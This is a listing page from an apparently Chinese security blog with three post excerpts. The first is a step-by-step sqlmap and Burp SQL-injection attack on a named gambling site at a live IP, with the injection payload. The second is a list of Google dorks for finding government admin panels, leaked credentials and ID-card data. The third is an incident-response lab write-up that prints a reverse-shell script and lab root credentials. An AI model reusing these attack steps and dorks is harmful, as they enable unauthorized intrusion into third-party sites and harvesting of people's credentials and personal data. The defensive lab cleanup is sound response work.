首页
关于
联系我们
本站友链
站点统计
站点留言
更多
本站壁纸
Search
1
cc攻击脚本加教程
92 阅读
2
植物大战僵尸杂交版秒杀包
69 阅读
3
子比搭建教程
64 阅读
4
黑客入侵黑页html源码
46 阅读
5
查看摄像头实时画面
45 阅读
默认分类
网络安全
个人笔记
网站源码
ctf
web
红蓝功防
应急响应
密码学
kali
linux
网安故事
日常
登录
/
注册
Search
标签搜索
ctf
网络安全
技术分享
工具
lucky博士
累计撰写
34
篇文章
累计收到
46
条评论
首页
栏目
默认分类
网络安全
个人笔记
网站源码
ctf
web
红蓝功防
应急响应
密码学
kali
linux
网安故事
日常
页面
关于
联系我们
本站友链
站点统计
站点留言
本站壁纸
搜索到
23
篇与
网络安全
的结果
2024-03-01
棋牌网站的简单渗透
网站后台界面存在POST注入漏洞环境准备网站链接:http://124.220.81.65:88/Login/index工具准备这里用到两个工具,sqlmap和burp工具下载隐藏内容,请前往内页查看详情环境部署和配置去百度直接搜第一步打开burp,进行抓包,具体操作请看vcr{dplayer src="http://blog.luckyos.top/1/st/1.mp4"/}第二步把抓到的内容全选复制,在工具里找到sqlmap文件夹,在文件夹里新建一个1.txt文件,把抓到的内容粘贴到1.txt内第三步按住键盘上的问键和r键,输入cmd打开命令行提示符,用cd命令进入到工具SQLmap文件夹内输入一下python sqlmap.py -v命令,测试一下,sqlmap能不能使用 ___ __H__ ___ ___[)]_____ ___ ___ {1.7.12.3#dev} |_ -| . [)] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org Usage: sqlmap.py [options] sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help Press Enter to continue...显示上面这个就是可以使用第四步输入命令python sqlmap.py -r 1.txt --random-agent这是会显示两次选择,输入y回车就行,后面也是一样--- Parameter: userName (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: userName=1';WAITFOR DELAY '0:0:5'--&password=1 ---这里可以知道该网站后台界面存在POST注入漏洞
2024年03月01日
38 阅读
1 评论
5 点赞
2024-03-01
谷歌搜索语法
分享几个野战用的Google Hacking语法site:gov.cn inurl:.login.asp (政府网站后台)inurl:gov.cn/admin (百度就可以)inurl:gitlab 公司 filetype:txtinurl:gitlab 公司 intext:账号site:. gitee.com intext:账号 ( ftp://:* 密码 地址)site:. gitee.com filetype:txt 账号 ( ftp://:* 密码 地址)site:gitlab.*.com intext:密码site: code.aliyun.com 2019 服务器地址filetype:xls site: 名单 //信息泄露inurl /search_results.php search= XSS 漏洞site:域名 inurl:admin用友:用友grpu8高校内控管理UFIDA NC协同-OA对公网的语法:inurl:备份 filetype:txt 密码inurl:config.php filetype:bakinurl:data“index of/” xxx (mp3等等)Index of /password“Index of /” +passwd“Index of /” +password.txtinurl:phpMyAdmininurl:ewebeditorintitle:后台管理intitle:后台管理 inurl:admininurl:baidu.cominurl:php?id=1inurl:loginsite: “身份证” “学生证” “1992” “1993” “1994” “1995” “1996” “1997” “1998” “1999” “2000”site:.cn filetype:xls “服务器” “地址” “账号”site:file.*.net(.com/.cn)inurl:ali “管理平台”cache类似于百度快照功能,通过cache或许可以查看到目标站点删除的敏感文件,也可以用来解决找目标站点的物理路径不报错,而无法找到物理路径。cache:xxx.com“” + – | AND将要搜索的关键字用引号括起来,搜索引擎将会搜索完全匹配关键字的网页“房产” +南京 //搜索与南京有关的房产“房产” -南京 //搜索结果除去南京的房产房产|酒店 //搜索房产或者酒店有关的页面,房产 AND 酒店 //搜索同时匹配房产与酒店这两个关键词的页面对限定目标类型的语法:inurl:gitlab 公司 filetype:txtinurl:gitlab 公司 intext:账号site:.gitee.com intext:账号 (ftp://:* 密码 地址)site:.gitee.com filetype:txt 账号 (ftp://:* 密码 地址)site:gitlab.*.com intext:密码site:code.aliyun.com 2019 服务器地址对限定域名的语法:site:xxxx.comsite:xxxx.com filetype: txt (doc docx xls xlsx txt pdf等)site:xxxx.com intext:管理site:xxxx.com inurl:loginsite:xxxx.com intitle:管理site:a2.xxxx.com filetype:asp(jsp php aspx等)site:a2.xxxx.com intext:ftp://:(地址 服务器 虚拟机 password等)site:a2.xxxx.com inurl:file(load)site:xxxx.com intext:*@xxxx.com //得到N个邮件地址,还有邮箱的主人的名字什么的site:xxxx.com intext:电话 //N个电话
2024年03月01日
8 阅读
0 评论
0 点赞
2024-03-01
靶机渗透-应急加固1
{mtitle title="靶机渗透-应急加固1"/} {callout color="#f0ad4e"}环境:服务器:139.196.218.29 账号:root 密码:qgQFmTaZrLERjtRaDnGP…{/callout}js劫持{callout color="#f0ad4e"}获取js劫持域名(带https){/callout}黑客首次webshell 密码{callout color="#f0ad4e"}黑客首次webshell 密码,不加flag{}{/callout} 黑客首次入侵方式{callout color="#f0ad4e"}黑客首次攻击(非有效攻击)通过什么方式(如:文件上传、SQL注入、命令执行){/callout}因为首个马在uploads文件夹下,猜测就是文件上传漏洞,但是不对,去看一下日志 xss黑客服务器的信息{callout color="#f0ad4e"}请找到黑客留下的后门中黑客服务器的ip及端口{/callout} 查看进程发现存在可疑1.sh 访问发现是反弹的shellroot@iZuf6i9l9nqrfyk7eo6l0nZ:/var/log/nginx# cat /var/www/html/runtime/cache/1.sh #!/bin/bash bash -i >& /dev/tcp/49.232.241.253/8888 0>&149.232.241.253:8888黑客的webshell2{callout color="#f0ad4e"}提交黑客上传的第二个webshell内的flag{/callout}{callout color="#f0ad4e"} web日志取证分析工具 - 实验室 - 腾讯安全应急响应中心 (tencent.com) https://strawberryperl.com/ {/callout}使用方法: Perl LogForensics.pl -file logfile -websvr (nginx|httpd) [-ip ip(ip,ip,ip)|-url url(url,url,url)] File:日志文件路径 Websvr : 日志类型 Ip: 起始调查IP或ip列表,以逗号分割 url: 起始调查cgi 链接或链接列表,以逗号分割usage: LogForensics.pl -file logfile -websvr (nginx|httpd) [-ip ip(ip,ip,ip)|-url url(url,url,url)] root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/log/nginx# ./LogForensics.pl -file ./access.log -websvr nginx Web log forensics ver2014102301 by xti9er [*] ip=NULL url=NULL [*] PRELOAD ./access.log Plz wait [*] LOAD ./access.log.db [!] ip + 59 & url + 6 and go on [*] Export report... Plz wait [*] All Done in 2 s , ip[1] url[6]1.php就是第二个马flag{5t945bbwxokj87f1ucjb2vc7zdnf8ix3}mysql{callout color="#f0ad4e"}修复mysql可getshell漏洞{/callout}先得连上数据库,找配置文件,这种可以先全局搜一下database.php,config.php等等关键词文件/var/www/html/application/database.php回收用户file权限并且关闭全局日志revoke file on *.* from 'root'@'localhost'; set global general_log = off; flush privileges;黑客的账号{callout color="#f0ad4e"}找到黑客添加的账号并删除{/callout}aman删除userdel aman黑客篡改的命令1{callout color="#f0ad4e"}修复黑客篡改的命令并且删除篡改命令生成的免杀马{/callout}删除替换rm ps mv ps_ ps rm ls mv ls2 ls rm /var/www/html/public/static/img/1.php修复JS劫持{callout color="#f0ad4e"}修复JS劫持{/callout}最慢的当然就是一点一点找了,或者用find命令root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# find . | xargs grep -ri '<script type="text/javascript">' -l | sort | uniq -c 6 ./application/home/view/public/js.html 4 ./runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php 4 ./runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php 4 ./thinkphp/tpl/dispatch_jump.tpl 4 ./thinkphp/tpl/page_trace.tpl删除俩马和恶意代码即可修复root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# rm ./runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# rm ./runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php{abtn icon="fa-user-o" color="#ff6800" href="http://blog.luckyos.top/1/wzskm.jpg" radius="17.5" content="欢迎打赏"/}
2024年03月01日
17 阅读
0 评论
3 点赞
1
...
4
5